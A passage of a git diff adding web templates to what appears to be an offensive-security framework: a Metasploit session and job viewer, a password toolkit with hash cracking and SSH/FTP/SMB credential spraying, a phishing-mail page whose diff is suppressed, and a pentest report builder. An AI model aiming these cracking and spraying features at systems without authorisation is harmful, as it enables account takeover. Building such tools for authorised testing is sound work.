out.innerHTML += '<div class="' + cls + '">' + escapeHtml(d.line) + '</div>';
|
||||
out.scrollTop = out.scrollHeight;
|
||||
}
|
||||
if (d.done) {
|
||||
status.textContent = 'Done.';
|
||||
stopBtn.style.display = 'none';
|
||||
if (d.open_ports && d.open_ports.length) out.innerHTML += '<div class="success">Open ports: ' + escapeHtml(d.open_ports.join(', ')) + '</div>';
|
||||
if (d.findings && d.findings.length) out.innerHTML += '<div class="success">Findings: ' + escapeHtml(JSON.stringify(d.findings)) + '</div>';
|
||||
if (d.open_ports && d.open_ports.length) {
|
||||
out.innerHTML += '<div class="success" style="margin-top:0.5rem;font-weight:600">Open ports: ' + d.open_ports.map(p => escapeHtml(String(p.port || p))).join(', ') + '</div>';
|
||||
}
|
||||
if (d.services && d.services.length) {
|
||||
let html = '<div style="margin-top:0.5rem;font-weight:600;color:var(--accent)">Services detected:</div>';
|
||||
d.services.forEach(s => { html += '<div class="success">' + escapeHtml(s.ip + ':' + s.port + ' — ' + s.info) + '</div>'; });
|
||||
out.innerHTML += html;
|
||||
}
|
||||
}
|
||||
} catch(e) {}
|
||||
});
|
||||
@ -286,7 +610,45 @@ function stopCurrentModule() {
|
||||
document.getElementById('run-status').textContent = 'Stopped.';
|
||||
}
|
||||
|
||||
// Agent Hal
|
||||
/* ── Sessions & Jobs ────────────────────────────────────────────── */
|
||||
function loadMSFSessions() {
|
||||
const el = document.getElementById('msf-sessions');
|
||||
fetch('/offense/sessions').then(r => r.json()).then(d => {
|
||||
if (d.error) { el.innerHTML = '<div class="empty-state">' + escapeHtml(d.error) + '</div>'; return; }
|
||||
const sessions = d.sessions || {};
|
||||
const keys = Object.keys(sessions);
|
||||
if (!keys.length) { el.innerHTML = '<div class="empty-state">No active sessions.</div>'; return; }
|
||||
let html = '<table style="width:100%;font-size:0.85rem"><tr><th>ID</th><th>Type</th><th>Target</th><th>Info</th></tr>';
|
||||
keys.forEach(sid => {
|
||||
const s = sessions[sid];
|
||||
html += '<tr><td>' + escapeHtml(sid) + '</td><td>' + escapeHtml(s.type || '') + '</td><td>' + escapeHtml(s.tunnel_peer || s.target_host || '') + '</td><td>' + escapeHtml(s.info || '') + '</td></tr>';
|
||||
});
|
||||
html += '</table>';
|
||||
el.innerHTML = html;
|
||||
}).catch(() => { el.innerHTML = '<div class="empty-state">Failed to load sessions.</div>'; });
|
||||
}
|
||||
|
||||
function loadMSFJobs() {
|
||||
const el = document.getElementById('msf-jobs');
|
||||
fetch('/offense/jobs').then(r => r.json()).then(d => {
|
||||
if (d.error) { el.innerHTML = '<div class="empty-state">' + escapeHtml(d.error) + '</div>'; return; }
|
||||
const jobs = d.jobs || {};
|
||||
const keys = Object.keys(jobs);
|
||||
if (!keys.length) { el.innerHTML = '<div class="empty-state">No running jobs.</div>'; return; }
|
||||
let html = '<table style="width:100%;font-size:0.85rem"><tr><th>ID</th><th>Name</th><th></th></tr>';
|
||||
keys.forEach(jid => {
|
||||
html += '<tr><td>' + escapeHtml(jid) + '</td><td>' + escapeHtml(String(jobs[jid])) + '</td><td><button class="btn btn-sm btn-danger" onclick="stopMSFJob(\'' + escapeHtml(jid) + '\')">Stop</button></td></tr>';
|
||||
});
|
||||
html += '</table>';
|
||||
el.innerHTML = html;
|
||||
}).catch(() => { el.innerHTML = '<div class="empty-state">Failed to load jobs.</div>'; });
|
||||
}
|
||||
|
||||
function stopMSFJob(jobId) {
|
||||
fetch('/offense/jobs/' + jobId + '/stop', {method:'POST'}).then(() => loadMSFJobs());
|
||||
}
|
||||
|
||||
/* ── Agent Hal ──────────────────────────────────────────────────── */
|
||||
async function runHalTask() {
|
||||
const task = v('agent-task');
|
||||
if (!task) return;
|
||||
|
||||
385
web/templates/password_toolkit.html
Normal file
385
web/templates/password_toolkit.html
Normal file
@ -0,0 +1,385 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}Password Toolkit — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Password Toolkit</h1>
|
||||
<p class="text-muted">Hash identification, cracking, generation, and credential testing</p>
|
||||
</div>
|
||||
|
||||
<div class="tabs">
|
||||
<button class="tab active" onclick="switchTab('identify')">Identify</button>
|
||||
<button class="tab" onclick="switchTab('crack')">Crack</button>
|
||||
<button class="tab" onclick="switchTab('generate')">Generate</button>
|
||||
<button class="tab" onclick="switchTab('spray')">Spray</button>
|
||||
<button class="tab" onclick="switchTab('wordlists')">Wordlists</button>
|
||||
</div>
|
||||
|
||||
<!-- Identify Tab -->
|
||||
<div id="tab-identify" class="tab-content active">
|
||||
<div class="card" style="max-width:800px">
|
||||
<h3>Hash Identification</h3>
|
||||
<div class="form-group">
|
||||
<label>Hash (one per line for batch)</label>
|
||||
<textarea id="id-hash" class="form-control" rows="3" placeholder="e3b0c44298fc1c149afbf4c8996fb924..."></textarea>
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="identifyHash()">Identify</button>
|
||||
<div id="id-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
<div class="card" style="margin-top:1rem;max-width:800px">
|
||||
<h3>Hash a String</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="flex:1;margin:0">
|
||||
<label>Plaintext</label>
|
||||
<input type="text" id="hash-plaintext" class="form-control" placeholder="text to hash">
|
||||
</div>
|
||||
<div class="form-group" style="width:140px;margin:0">
|
||||
<label>Algorithm</label>
|
||||
<select id="hash-algo" class="form-control">
|
||||
<option value="md5">MD5</option>
|
||||
<option value="sha1">SHA-1</option>
|
||||
<option value="sha256" selected>SHA-256</option>
|
||||
<option value="sha512">SHA-512</option>
|
||||
</select>
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="hashString()" style="height:38px">Hash</button>
|
||||
</div>
|
||||
<div id="hash-result" style="margin-top:0.5rem;font-family:monospace;font-size:0.85rem;word-break:break-all"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Crack Tab -->
|
||||
<div id="tab-crack" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:800px">
|
||||
<h3>Hash Cracker</h3>
|
||||
<div class="form-group">
|
||||
<label>Hash</label>
|
||||
<input type="text" id="crack-hash" class="form-control" placeholder="hash to crack">
|
||||
</div>
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.5rem">
|
||||
<div class="form-group">
|
||||
<label>Hash Type</label>
|
||||
<select id="crack-type" class="form-control">
|
||||
<option value="auto">Auto-detect</option>
|
||||
<option value="MD5">MD5</option>
|
||||
<option value="SHA-1">SHA-1</option>
|
||||
<option value="SHA-256">SHA-256</option>
|
||||
<option value="SHA-512">SHA-512</option>
|
||||
<option value="NTLM">NTLM</option>
|
||||
<option value="bcrypt">bcrypt</option>
|
||||
<option value="SHA-512 Crypt">SHA-512 Crypt</option>
|
||||
<option value="MySQL 4.1+">MySQL 4.1+</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Attack Mode</label>
|
||||
<select id="crack-mode" class="form-control">
|
||||
<option value="dictionary">Dictionary</option>
|
||||
<option value="brute_force">Brute Force</option>
|
||||
<option value="mask">Mask</option>
|
||||
<option value="hybrid">Hybrid</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Tool</label>
|
||||
<select id="crack-tool" class="form-control">
|
||||
<option value="auto">Auto (hashcat → john → python)</option>
|
||||
<option value="hashcat">hashcat</option>
|
||||
<option value="john">John the Ripper</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Mask (for mask/brute)</label>
|
||||
<input type="text" id="crack-mask" class="form-control" placeholder="?a?a?a?a?a?a?a?a">
|
||||
</div>
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="startCrack()">Crack</button>
|
||||
<div id="crack-status" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
<div class="card" style="margin-top:1rem;max-width:800px">
|
||||
<h3>Available Tools</h3>
|
||||
<div id="tools-status" style="font-size:0.85rem">Loading...</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Generate Tab -->
|
||||
<div id="tab-generate" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:800px">
|
||||
<h3>Password Generator</h3>
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.5rem">
|
||||
<div class="form-group">
|
||||
<label>Length</label>
|
||||
<input type="number" id="gen-length" class="form-control" value="16" min="4" max="128">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Count</label>
|
||||
<input type="number" id="gen-count" class="form-control" value="5" min="1" max="50">
|
||||
</div>
|
||||
</div>
|
||||
<div style="display:flex;gap:1rem;margin:0.5rem 0;font-size:0.85rem;flex-wrap:wrap">
|
||||
<label><input type="checkbox" id="gen-upper" checked> Uppercase</label>
|
||||
<label><input type="checkbox" id="gen-lower" checked> Lowercase</label>
|
||||
<label><input type="checkbox" id="gen-digits" checked> Digits</label>
|
||||
<label><input type="checkbox" id="gen-symbols" checked> Symbols</label>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Pattern (optional — ?u=upper ?l=lower ?d=digit ?s=symbol ?a=any)</label>
|
||||
<input type="text" id="gen-pattern" class="form-control" placeholder="?u?l?l?l?l?d?d?s">
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="generatePw()">Generate</button>
|
||||
<div id="gen-results" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
<div class="card" style="margin-top:1rem;max-width:800px">
|
||||
<h3>Password Strength Auditor</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="flex:1;margin:0">
|
||||
<input type="text" id="audit-pw" class="form-control" placeholder="password to audit" oninput="liveAudit()">
|
||||
</div>
|
||||
</div>
|
||||
<div id="audit-result" style="margin-top:0.5rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Spray Tab -->
|
||||
<div id="tab-spray" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:800px">
|
||||
<h3>Credential Spray</h3>
|
||||
<div class="form-group">
|
||||
<label>Targets (one per line: host:port:username)</label>
|
||||
<textarea id="spray-targets" class="form-control" rows="4" placeholder="192.168.1.100:22:admin 192.168.1.101:22:root"></textarea>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Passwords (one per line)</label>
|
||||
<textarea id="spray-passwords" class="form-control" rows="4" placeholder="admin password 123456 root"></textarea>
|
||||
</div>
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.5rem">
|
||||
<div class="form-group">
|
||||
<label>Protocol</label>
|
||||
<select id="spray-proto" class="form-control">
|
||||
<option value="ssh">SSH</option>
|
||||
<option value="ftp">FTP</option>
|
||||
<option value="smb">SMB</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Delay (seconds)</label>
|
||||
<input type="number" id="spray-delay" class="form-control" value="1" min="0" step="0.5">
|
||||
</div>
|
||||
</div>
|
||||
<button class="btn btn-primary" onclick="startSpray()">Start Spray</button>
|
||||
<div id="spray-status" style="margin-top:1rem"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Wordlists Tab -->
|
||||
<div id="tab-wordlists" class="tab-content" style="display:none">
|
||||
<div class="card" style="max-width:800px">
|
||||
<h3>Wordlist Management</h3>
|
||||
<div style="display:flex;gap:0.5rem;align-items:end;margin-bottom:1rem">
|
||||
<input type="file" id="wl-upload" class="form-control" style="flex:1">
|
||||
<button class="btn btn-primary" onclick="uploadWordlist()">Upload</button>
|
||||
</div>
|
||||
<div id="wl-list"></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.strength-bar{height:6px;border-radius:3px;background:var(--bg-input);margin:4px 0;overflow:hidden}
|
||||
.strength-fill{height:100%;border-radius:3px;transition:width 0.3s}
|
||||
.str-very_weak .strength-fill{width:15%;background:#ef4444}
|
||||
.str-weak .strength-fill{width:35%;background:#f59e0b}
|
||||
.str-medium .strength-fill{width:55%;background:#eab308}
|
||||
.str-strong .strength-fill{width:75%;background:#22c55e}
|
||||
.str-very_strong .strength-fill{width:100%;background:#10b981}
|
||||
.pw-row{display:flex;align-items:center;gap:0.5rem;padding:0.3rem 0;font-family:monospace;font-size:0.85rem}
|
||||
.pw-row .copy-btn{cursor:pointer;color:var(--accent);font-size:0.75rem}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let crackPoll=null,sprayPoll=null;
|
||||
|
||||
function switchTab(name){
|
||||
document.querySelectorAll('.tab').forEach((t,i)=>t.classList.toggle('active',
|
||||
['identify','crack','generate','spray','wordlists'][i]===name));
|
||||
document.querySelectorAll('.tab-content').forEach(c=>c.style.display='none');
|
||||
document.getElementById('tab-'+name).style.display='';
|
||||
if(name==='crack') loadTools();
|
||||
if(name==='wordlists') loadWordlists();
|
||||
}
|
||||
|
||||
function identifyHash(){
|
||||
const text=document.getElementById('id-hash').value.trim();
|
||||
if(!text) return;
|
||||
const hashes=text.split('\n').map(h=>h.trim()).filter(Boolean);
|
||||
const payload=hashes.length===1?{hash:hashes[0]}:{hashes};
|
||||
fetch('/password-toolkit/identify',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
const div=document.getElementById('id-results');
|
||||
if(d.types){
|
||||
div.innerHTML=d.types.length?d.types.map(t=>`<div style="padding:4px 0">
|
||||
<span class="conf-${t.confidence}" style="display:inline-block;width:70px">${t.confidence.toUpperCase()}</span>
|
||||
<strong>${t.name}</strong>
|
||||
<span style="color:var(--text-muted);font-size:0.8rem;margin-left:0.5rem">hashcat: ${t.hashcat_mode} | john: ${t.john_format||'—'}</span>
|
||||
</div>`).join(''):'<div style="color:var(--text-muted)">No matching hash types</div>';
|
||||
} else if(d.results){
|
||||
div.innerHTML=d.results.map(r=>`<div style="margin-bottom:0.5rem;border-bottom:1px solid var(--border);padding-bottom:0.5rem">
|
||||
<code style="font-size:0.8rem">${esc(r.hash)}</code><br>
|
||||
${r.types.length?r.types.map(t=>`<span class="conf-${t.confidence}">${t.confidence.toUpperCase()}</span> ${t.name} `).join(' | '):'<span style="color:var(--text-muted)">Unknown</span>'}
|
||||
</div>`).join('');
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
function hashString(){
|
||||
const plaintext=document.getElementById('hash-plaintext').value;
|
||||
const algo=document.getElementById('hash-algo').value;
|
||||
fetch('/password-toolkit/hash',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({plaintext,algorithm:algo})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
document.getElementById('hash-result').innerHTML=d.ok?
|
||||
`<strong>${d.algorithm}:</strong> ${d.hash} <span class="copy-btn" onclick="navigator.clipboard.writeText('${d.hash}')">[copy]</span>`
|
||||
:`Error: ${d.error}`;
|
||||
});
|
||||
}
|
||||
|
||||
function startCrack(){
|
||||
const hash=document.getElementById('crack-hash').value.trim();
|
||||
if(!hash) return;
|
||||
const payload={hash,hash_type:document.getElementById('crack-type').value,
|
||||
attack_mode:document.getElementById('crack-mode').value,
|
||||
tool:document.getElementById('crack-tool').value,
|
||||
mask:document.getElementById('crack-mask').value};
|
||||
const div=document.getElementById('crack-status');
|
||||
div.innerHTML='<div class="spinner-inline"></div> Cracking...';
|
||||
fetch('/password-toolkit/crack',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(d.cracked){
|
||||
div.innerHTML=`<div style="color:#22c55e;font-weight:700">CRACKED: ${esc(d.cracked)}</div>
|
||||
${d.message?'<div>'+esc(d.message)+'</div>':''}`;
|
||||
} else if(d.job_id){
|
||||
div.innerHTML='<div class="spinner-inline"></div> '+esc(d.message);
|
||||
if(crackPoll) clearInterval(crackPoll);
|
||||
crackPoll=setInterval(()=>{
|
||||
fetch('/password-toolkit/crack/'+d.job_id).then(r=>r.json()).then(s=>{
|
||||
if(!s.done) return;
|
||||
clearInterval(crackPoll);crackPoll=null;
|
||||
if(s.cracked) div.innerHTML=`<div style="color:#22c55e;font-weight:700">CRACKED: ${esc(s.cracked)}</div>`;
|
||||
else div.innerHTML=`<div style="color:var(--text-muted)">Not cracked. ${esc(s.message||'')}</div>`;
|
||||
});
|
||||
},2000);
|
||||
} else {
|
||||
div.innerHTML=`<div style="color:var(--text-muted)">${esc(d.message||d.error||'No result')}</div>`;
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
function loadTools(){
|
||||
fetch('/password-toolkit/tools').then(r=>r.json()).then(d=>{
|
||||
const div=document.getElementById('tools-status');
|
||||
div.innerHTML=['hashcat','john','hydra','ncrack'].map(t=>{
|
||||
const ok=d[t];
|
||||
return `<span style="margin-right:1rem">${ok?'<span style="color:#22c55e">✓</span>':'<span style="color:var(--danger)">✗</span>'} ${t}</span>`;
|
||||
}).join('');
|
||||
});
|
||||
}
|
||||
|
||||
function generatePw(){
|
||||
const payload={length:+document.getElementById('gen-length').value,
|
||||
count:+document.getElementById('gen-count').value,
|
||||
uppercase:document.getElementById('gen-upper').checked,
|
||||
lowercase:document.getElementById('gen-lower').checked,
|
||||
digits:document.getElementById('gen-digits').checked,
|
||||
symbols:document.getElementById('gen-symbols').checked,
|
||||
pattern:document.getElementById('gen-pattern').value};
|
||||
fetch('/password-toolkit/generate',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok) return;
|
||||
document.getElementById('gen-results').innerHTML=d.passwords.map(p=>`<div class="pw-row">
|
||||
<code>${esc(p.password)}</code>
|
||||
<span class="copy-btn" onclick="navigator.clipboard.writeText('${esc(p.password)}')">[copy]</span>
|
||||
<span style="font-size:0.75rem;color:var(--text-muted)">${p.entropy} bits — ${p.strength}</span>
|
||||
<div class="strength-bar str-${p.strength}" style="width:100px"><div class="strength-fill"></div></div>
|
||||
</div>`).join('');
|
||||
});
|
||||
}
|
||||
|
||||
let auditTimer=null;
|
||||
function liveAudit(){
|
||||
if(auditTimer) clearTimeout(auditTimer);
|
||||
auditTimer=setTimeout(()=>{
|
||||
const pw=document.getElementById('audit-pw').value;
|
||||
if(!pw){document.getElementById('audit-result').innerHTML='';return}
|
||||
fetch('/password-toolkit/audit',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({password:pw})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok) return;
|
||||
const colors={very_weak:'#ef4444',weak:'#f59e0b',medium:'#eab308',strong:'#22c55e',very_strong:'#10b981'};
|
||||
document.getElementById('audit-result').innerHTML=`
|
||||
<div style="display:flex;gap:1rem;align-items:center;margin-bottom:0.5rem">
|
||||
<strong style="color:${colors[d.strength]}">${d.strength.replace('_',' ').toUpperCase()}</strong>
|
||||
<span>${d.entropy} bits entropy</span>
|
||||
<span>charset: ${d.charset_size}</span>
|
||||
</div>
|
||||
<div class="strength-bar str-${d.strength}" style="width:200px"><div class="strength-fill"></div></div>
|
||||
<div style="font-size:0.8rem;margin-top:0.5rem">${Object.entries(d.checks).map(([k,v])=>
|
||||
`<span style="margin-right:0.75rem">${v?'<span style="color:#22c55e">✓</span>':'<span style="color:var(--danger)">✗</span>'} ${k.replace(/_/g,' ')}</span>`
|
||||
).join('')}</div>`;
|
||||
});
|
||||
},300);
|
||||
}
|
||||
|
||||
function startSpray(){
|
||||
const targets=document.getElementById('spray-targets').value.trim().split('\n').filter(Boolean).map(l=>{
|
||||
const p=l.split(':');return{host:p[0],port:+(p[1]||22),username:p[2]||'admin'}});
|
||||
const passwords=document.getElementById('spray-passwords').value.trim().split('\n').filter(Boolean);
|
||||
const payload={targets,passwords,protocol:document.getElementById('spray-proto').value,
|
||||
delay:+document.getElementById('spray-delay').value};
|
||||
const div=document.getElementById('spray-status');
|
||||
div.innerHTML='<div class="spinner-inline"></div> Starting spray...';
|
||||
fetch('/password-toolkit/spray',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify(payload)})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){div.innerHTML='Error: '+esc(d.error);return}
|
||||
if(sprayPoll) clearInterval(sprayPoll);
|
||||
sprayPoll=setInterval(()=>{
|
||||
fetch('/password-toolkit/spray/'+d.job_id).then(r=>r.json()).then(s=>{
|
||||
let html=`<div>Progress: ${s.tested}/${s.total}</div>`;
|
||||
if(s.found&&s.found.length) html+=`<div style="color:#22c55e;font-weight:700;margin-top:0.5rem">Found credentials:</div>`+
|
||||
s.found.map(c=>`<div style="font-family:monospace">${c.protocol}://${esc(c.username)}:${esc(c.password)}@${esc(c.host)}:${c.port}</div>`).join('');
|
||||
if(s.done){clearInterval(sprayPoll);sprayPoll=null;html+='<div style="margin-top:0.5rem;color:var(--text-muted)">Spray complete.</div>'}
|
||||
else html='<div class="spinner-inline"></div> '+html;
|
||||
div.innerHTML=html;
|
||||
});
|
||||
},2000);
|
||||
});
|
||||
}
|
||||
|
||||
function loadWordlists(){
|
||||
fetch('/password-toolkit/wordlists').then(r=>r.json()).then(d=>{
|
||||
const div=document.getElementById('wl-list');
|
||||
const wls=d.wordlists||[];
|
||||
if(!wls.length){div.innerHTML='<div style="color:var(--text-muted)">No wordlists found. Upload one or install rockyou.txt.</div>';return}
|
||||
div.innerHTML='<table class="data-table"><thead><tr><th>Name</th><th>Size</th><th>Lines</th><th></th></tr></thead><tbody>'+
|
||||
wls.map(w=>`<tr><td>${esc(w.name)}${w.system?' <span style="color:var(--text-muted);font-size:0.75rem">[system]</span>':''}</td>
|
||||
<td>${w.size_human}</td><td>${w.lines>=0?w.lines.toLocaleString():'—'}</td>
|
||||
<td>${w.system?'':'<button class="btn btn-sm" style="color:var(--danger)" onclick="deleteWordlist(\''+esc(w.name)+'\')">Delete</button>'}</td></tr>`).join('')+
|
||||
'</tbody></table>';
|
||||
});
|
||||
}
|
||||
|
||||
function uploadWordlist(){
|
||||
const input=document.getElementById('wl-upload');
|
||||
if(!input.files.length) return;
|
||||
const fd=new FormData();fd.append('file',input.files[0]);
|
||||
fetch('/password-toolkit/wordlists',{method:'POST',body:fd})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(d.ok) loadWordlists();
|
||||
else alert(d.error);
|
||||
});
|
||||
}
|
||||
|
||||
function deleteWordlist(name){
|
||||
if(!confirm('Delete wordlist: '+name+'?')) return;
|
||||
fetch('/password-toolkit/wordlists/'+encodeURIComponent(name),{method:'DELETE'})
|
||||
.then(r=>r.json()).then(()=>loadWordlists());
|
||||
}
|
||||
|
||||
function esc(s){return s?String(s).replace(/&/g,'&').replace(/</g,'<').replace(/>/g,'>').replace(/"/g,'"').replace(/'/g,'''):''}
|
||||
</script>
|
||||
{% endblock %}
|
||||
1091
web/templates/phishmail.html
Normal file
1091
web/templates/phishmail.html
Normal file
File diff suppressed because it is too large
Load Diff
246
web/templates/report_engine.html
Normal file
246
web/templates/report_engine.html
Normal file
@ -0,0 +1,246 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}Reports — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Reporting Engine</h1>
|
||||
<p class="text-muted">Pentest report builder with findings, CVSS scoring, and export</p>
|
||||
</div>
|
||||
|
||||
<div class="tabs">
|
||||
<button class="tab active" onclick="switchTab('reports')">Reports</button>
|
||||
<button class="tab" onclick="switchTab('editor')">Editor</button>
|
||||
<button class="tab" onclick="switchTab('templates')">Finding Templates</button>
|
||||
</div>
|
||||
|
||||
<!-- Reports List -->
|
||||
<div id="tab-reports" class="tab-content active">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:1rem">
|
||||
<h3>Reports</h3>
|
||||
<button class="btn btn-primary" onclick="showCreateReport()">New Report</button>
|
||||
</div>
|
||||
<div id="create-form" class="card" style="display:none;margin-bottom:1rem;max-width:600px">
|
||||
<h4>Create Report</h4>
|
||||
<div class="form-group"><label>Title</label><input type="text" id="cr-title" class="form-control" placeholder="Penetration Test Report"></div>
|
||||
<div class="form-group"><label>Client</label><input type="text" id="cr-client" class="form-control" placeholder="Client name"></div>
|
||||
<div class="form-group"><label>Scope</label><textarea id="cr-scope" class="form-control" rows="2" placeholder="Target systems and IP ranges"></textarea></div>
|
||||
<button class="btn btn-primary" onclick="createReport()">Create</button>
|
||||
</div>
|
||||
<div id="reports-list"></div>
|
||||
</div>
|
||||
|
||||
<!-- Editor -->
|
||||
<div id="tab-editor" class="tab-content" style="display:none">
|
||||
<div id="editor-empty" class="card" style="text-align:center;color:var(--text-muted)">Select a report from the Reports tab</div>
|
||||
<div id="editor" style="display:none">
|
||||
<div class="card">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<h3 id="ed-title" style="margin:0"></h3>
|
||||
<div style="display:flex;gap:0.5rem">
|
||||
<select id="ed-status" class="form-control" style="width:auto" onchange="updateReportField('status',this.value)">
|
||||
<option value="draft">Draft</option>
|
||||
<option value="review">Review</option>
|
||||
<option value="final">Final</option>
|
||||
</select>
|
||||
<button class="btn btn-sm" onclick="exportReport('html')">Export HTML</button>
|
||||
<button class="btn btn-sm" onclick="exportReport('markdown')">Export MD</button>
|
||||
<button class="btn btn-sm" onclick="exportReport('json')">Export JSON</button>
|
||||
</div>
|
||||
</div>
|
||||
<div class="form-group" style="margin-top:1rem"><label>Executive Summary</label>
|
||||
<textarea id="ed-summary" class="form-control" rows="3" onblur="updateReportField('executive_summary',this.value)"></textarea></div>
|
||||
</div>
|
||||
|
||||
<!-- Severity Summary -->
|
||||
<div id="sev-summary" style="display:flex;gap:0.75rem;margin:1rem 0"></div>
|
||||
|
||||
<!-- Findings -->
|
||||
<div style="display:flex;justify-content:space-between;align-items:center;margin:1rem 0">
|
||||
<h3>Findings</h3>
|
||||
<div style="display:flex;gap:0.5rem">
|
||||
<button class="btn btn-primary btn-sm" onclick="showAddFinding()">Add Finding</button>
|
||||
<button class="btn btn-sm" onclick="showTemplateSelector()">From Template</button>
|
||||
</div>
|
||||
</div>
|
||||
<div id="findings-list"></div>
|
||||
|
||||
<!-- Add finding form -->
|
||||
<div id="add-finding-form" class="card" style="display:none;margin-top:1rem">
|
||||
<h4>Add Finding</h4>
|
||||
<div class="form-group"><label>Title</label><input type="text" id="af-title" class="form-control"></div>
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.5rem">
|
||||
<div class="form-group"><label>Severity</label>
|
||||
<select id="af-severity" class="form-control">
|
||||
<option value="critical">Critical</option><option value="high">High</option>
|
||||
<option value="medium" selected>Medium</option><option value="low">Low</option><option value="info">Info</option>
|
||||
</select></div>
|
||||
<div class="form-group"><label>CVSS Score</label><input type="number" id="af-cvss" class="form-control" value="5.0" min="0" max="10" step="0.1"></div>
|
||||
</div>
|
||||
<div class="form-group"><label>Description</label><textarea id="af-desc" class="form-control" rows="2"></textarea></div>
|
||||
<div class="form-group"><label>Impact</label><textarea id="af-impact" class="form-control" rows="2"></textarea></div>
|
||||
<div class="form-group"><label>Remediation</label><textarea id="af-remediation" class="form-control" rows="2"></textarea></div>
|
||||
<button class="btn btn-primary" onclick="addFinding()">Add</button>
|
||||
<button class="btn" onclick="document.getElementById('add-finding-form').style.display='none'">Cancel</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Templates -->
|
||||
<div id="tab-templates" class="tab-content" style="display:none">
|
||||
<h3>Finding Templates</h3>
|
||||
<div id="templates-list"></div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.sev-badge{display:inline-block;padding:2px 8px;border-radius:4px;font-size:0.75rem;font-weight:700;color:#fff}
|
||||
.sev-critical{background:#dc2626}.sev-high{background:#ef4444}.sev-medium{background:#f59e0b}.sev-low{background:#22c55e}.sev-info{background:#6366f1}
|
||||
.sev-box{border:2px solid;border-radius:8px;padding:0.5rem 1rem;text-align:center;min-width:70px}
|
||||
.finding-card{border:1px solid var(--border);border-radius:var(--radius);padding:1rem;margin-bottom:0.75rem}
|
||||
.finding-card h4{margin:0 0 0.5rem}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let currentReportId=null;
|
||||
|
||||
function switchTab(name){
|
||||
document.querySelectorAll('.tab').forEach((t,i)=>t.classList.toggle('active',['reports','editor','templates'][i]===name));
|
||||
document.querySelectorAll('.tab-content').forEach(c=>c.style.display='none');
|
||||
document.getElementById('tab-'+name).style.display='';
|
||||
if(name==='reports') loadReports();
|
||||
if(name==='templates') loadTemplates();
|
||||
}
|
||||
|
||||
function loadReports(){
|
||||
fetch('/reports/list').then(r=>r.json()).then(d=>{
|
||||
const div=document.getElementById('reports-list');
|
||||
const reps=d.reports||[];
|
||||
if(!reps.length){div.innerHTML='<div class="card" style="text-align:center;color:var(--text-muted)">No reports yet</div>';return}
|
||||
div.innerHTML=reps.map(r=>`<div class="card" style="margin-bottom:0.5rem;cursor:pointer" onclick="openReport('${r.id}')">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<div><strong>${esc(r.title)}</strong> <span style="color:var(--text-muted);font-size:0.8rem">${esc(r.client)}</span></div>
|
||||
<div style="display:flex;align-items:center;gap:0.75rem">
|
||||
<span style="font-size:0.8rem">${r.findings_count} findings</span>
|
||||
<span class="sev-badge sev-${r.status==='final'?'info':r.status==='review'?'medium':'low'}">${r.status}</span>
|
||||
<button class="btn btn-sm" style="color:var(--danger)" onclick="event.stopPropagation();deleteReport('${r.id}')">Delete</button>
|
||||
</div>
|
||||
</div></div>`).join('');
|
||||
});
|
||||
}
|
||||
|
||||
